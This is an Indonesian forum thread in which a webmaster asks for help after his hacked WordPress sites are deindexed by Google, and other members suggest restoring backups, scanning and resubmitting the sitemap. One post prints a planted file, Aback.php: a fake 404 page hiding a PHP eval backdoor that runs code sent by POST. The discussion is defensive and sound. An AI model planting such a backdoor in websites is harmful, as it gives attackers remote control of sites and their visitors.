1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

Apakah ini termasuk kejahatan di dunia Imers??

Discussion in 'Wordpress' started by ariskemb, Jun 23, 2017.

1. ariskemb

ariskemb Ads.id Fan

Assalamualaikum, Minal Aa’idin Wal Faa’iziin

Maaf agan-agan sekalian yang sudah pernah mengalami hal seperti ini, semua website di Hosting ku kena Deindex, notif di Webmaster katanya kena Retas oleh pihak ke Tiga...

Saya coba cek site:url . com hasilnya aneh, seperti kena virus... Cek screenshoot

Tolong agan-agan yang sudah mengalami hal seperti ini, dan tau cara mengatasinya ... ???

Index Google Error site URL.png Notif di Webmaster.png

2. antoterong

antoterong Super Hero

Betul gan itu kejahatan dunia maya.

Solusinya cuman restore back up. Ada back up pribadi? Klo gak ada minta hostingnya, kadang gratis kadang bayar. Coba tanyakan apakah hostingnya baru aja ke hack atau cuma situs agan. Tapi kemungkinan mereka ngakuin ke hack kecil. Klo mereka ngaku, coba minta kompensasi dan suruh restore back up dgn gratis. Berarti ini bukan masalah di website agan, terserah mau diperbaiki security webnya (klo ada) atau tidak.

Klo mereka bilang gak ke hack hostingnya, berarti masalah di website agan. Jangan lupa selama proses restore dll di maintenance mode, terus perbaiki securitynya, klo udah baru dibuka lagi websitenya.

Klo bisa pakai deny all allow only IP agan selama perbaikan.

Klo dari sisi Google, setelah semua beres minta ditinjau ulang, nanti pelan-pelan rank akan balik normal, ada kemungkinan tidak akan sebagus sebelumnya.

3. mariberdansa

mariberdansa Banned

ada file backup nya ga bro?

4. ariskemb

ariskemb Ads.id Fan

Trimakasih banyak gan infonya, saya coba hubungi penyedia hosting dlu,

Oya gan, di directory hosting saja ada yang aneh, yakni disemua website yang error terdapat file Aback.php ... Apa karna ada file tersebut jdi error seperti ini???

File Aback php di Hosting.png

5. ariskemb

ariskemb Ads.id Fan

Kayanya cuma ada Wp-Content gan, backupan MySql Database nya ga ada..

Apa bisa cuma modal Wp-Content bisa kembali normal gan???

6. antoterong

antoterong Super Hero

Kurang tahu gan, coba di donlot di liat isi kode phpnya apa. Normalnya sih gak ada file Aback.php di Wordpress.
    Saya cek di Google gak ada result yg bagus, malah beberapa situs yg ke hack juga yg ada Aback.php nya.
    Coba di rename atau dimasukkan trash, terus buka dan refresh situs agan, hasilnya kyk gimana.

7. ariskemb

ariskemb Ads.id Fan

Iya gan, isi dari Aback.php seperti ini :

werwrwr
    <html>404<script language="php">@eval($_POST[ccc])</script>
    <div style="background:url(http://www.designfinder(dot)net/uploads/gallery/design-404-error-page-331(dot)png)
    white center no-repeat scroll;width:1200px;height:900px;font-size:30px;text-align:center;"><a href="http://pbagde(dot)com">GO HOME</a></div>

</body>
    </html>

Kalo masalah tampilan dan isi website si masih sama gan, cuma yg error di index google nya saja

Last edited: Jun 23, 2017
  8. mariberdansa

mariberdansa Banned

hubungi pihak hosting gan menurut saya mah

9. antoterong

antoterong Super Hero

Hmmm... bener juga, websitenya masih utuh. Ini theme free dari wp org atau premium bajakan?

Kok kayak ke hack terus sama hackernya sengaja dibikin beda klo dicrawler Google dibanding klo diliat sama visitor biasa.

Saya check di halaman yg 404, javascript asli WP masih orisinal, gak ada perubahan. javascript theme yg nivo dan custom juga gak ada script aneh. Pagesource juga gak ada yg aneh.

Oh iya, coba link yg dari Google Jepang-Jepang itu, kan klo dibuka error, coba agan fetch dari Google, terus dibuka, jgn cuma fetch aja, jadi biar kebuknya lewat IP Google, hasilnya gimana.

Saya cek di Google, pakai "tulisan Jepang snipet title", banyak juga yg kena hack kyk agan.

Susah ini gan klo gak ada back up yg sehat buat ngebandingin filenya. Ini hostingnya mana gan?

Gak ada plugin bajakan kan?

Biasanya @daffyshaci jago soal beginian, mungkin bisa membantu.

Saya cek ternyata lintas hosting korbannya, gak hanya dari hosting tertentu. Theme yg kena juga macam-macam.

Last edited: Jun 23, 2017
  10. ariskemb

ariskemb Ads.id Fan

Iya gan jadi ada 5 website di hosting ini, yg elokmubarok itu kyanya free dri wordpress org karna cma bwt nambag value jualan gorden di kota ku

Lah yg bwt adsense ada 2, yg satu sdh bener2 deindex, ga ada visitor blas, tpi yg satu nya masih utuh visitor nya tpi diwebmaster website tersebut sdh ditambahkan owner baru... Mungkin karna url website tersbt ada bhsa inggris nya

Saya pke hosting lokalan gan, kyanya ga bisa saya Sebutin disini mbok jdi kisruh. Hehe

Kayanya ini hacker luar negri, soalnya dri 5 website saya hanya 2 website yg ditambahkan new owner di webmaster dan kebetulan 2 website trsbt judul url nya pke b.inggris

Ini sdh hubungi penyedia hosting tpi blm dibalas, klo utk backup yg perlu disediakan apa aja gan? Saya pnya nya backupan wp-content saja, database nya lupa ga tak bakup

11. antoterong

antoterong Super Hero

Coba di cek reply saya sblmnya gan, sudah saya update.

Wah kayaknya bakal repot nih... Semoga ada master disini yg bisa bantu. Klo cara yg saya tahu sih panjang, dan klo harus dijelasin detail haduh.... Semoga ada yg cara pendek...

Klo yg ada Adsensenya, klo ke hack juga, mending Adsensenya di off in dulu, entah di lepas atau di deotorisasi, soalnya bisa kena masalah juga Adsensenya.

Udah coba di scan websitenya? pakai Sucuri atau yg satunya, tapi saya gak tanggung, terakhir nyoba prosesnya ngehang saya, tapi rating pluginnya bagus. Klo Sucuri saya pakai lmyn bagus tapi kyknya kurang detail ngeceknya. Resiko ditanggung sendiri ya gan.. :D

12. hasanjoearmstrong

hasanjoearmstrong Ads.id Fan

Itu namanya kena hack gan. Kalo websitenya udah bener lagi coba resubmite sitemap.xmlnya

13. KangJajang

KangJajang Ads.id Starter

masih belum solved ini?
    kelanjutannya proggressnya gimana?

14. reccountme

reccountme Ads.id Pro

Maaf bukan bermaksut merendahkan hosting lokal..saya beberapa kali kena hack index.phpnya di inject script iframe..setelah pindah hosting luar sampai saat ini masih baik saja..smoga baik selamanya

Sent from my Infinix-X600-LTE using Tapatalk

Share This Page